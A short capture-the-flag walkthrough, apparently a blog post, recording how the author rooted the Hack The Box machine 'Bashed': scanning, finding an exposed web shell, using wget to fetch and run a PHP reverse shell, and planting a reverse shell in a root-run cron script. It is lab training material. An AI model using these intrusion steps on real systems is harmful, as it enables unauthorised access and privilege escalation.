TCM PEH Hacking Bashed Notes
HTB Bashed
Recording actions to derive method
nmap -A -T4 -p- 10.10.10.68
Noted open port 80
Noted Apache 2.4.18
Noted Ubuntu OS
searchsploit apache 2.4
Noted results apache2ctl local exploit
Visited 10.10.10.68:80 in browser
Naavigated around
dirbuster&
http://10.10.10.68
port 80
go faster
medium wordlist
directories and file extensions
extension php
Letting dirbuster run
Viewed source for a few pages, nothing unusual
Dirbuster results
Noted /uploads
Noted /dev
Noted /dev/phpbash
Navigated to 10.10.10.68/dev/phpbash.php
Noted that it’s a web shell
ls
cd /; ls
ls /home
whoami
ls /home/
cd arrexel
cat user.txt
sudo -l
Noted can run scriptmanager with NOPASSWD
sudo su scriptmanager
Noted no tty present for user scriptmanager
Changed IP and PORT
Saved as rev.php
Created netcat listener
Created python http server from rev.php’s directory
In webshell
wget http://hisIP/rev.php
ls
Noted rev.php exists
Navigated to /10.10.10.68/uploads/rev.php
Noted shell connected
Noted can’t access tty
python -c ‘import pty; pty.spawn("/bin/bash");’
sudo su scriptmanager
Noted failed to switch user
sudo -u scriptmanager /bin/bash
Noted that we are now scriptmanager!
pwd
ls -la
hsitory
cd scripts
ls -la
Noted test.py and test.txt
cat test.py
Noted it opens test.txt, writes to it, then closes it
Noted that time ran was mere minutes ago
Noted that means cronjob
Noted it’s saving test.txt as root
Copy/pasted python reverse shell into test.py (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
Started new netcat listener
Noted test.py ran and netcat caught shell
Noted shell user is root
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!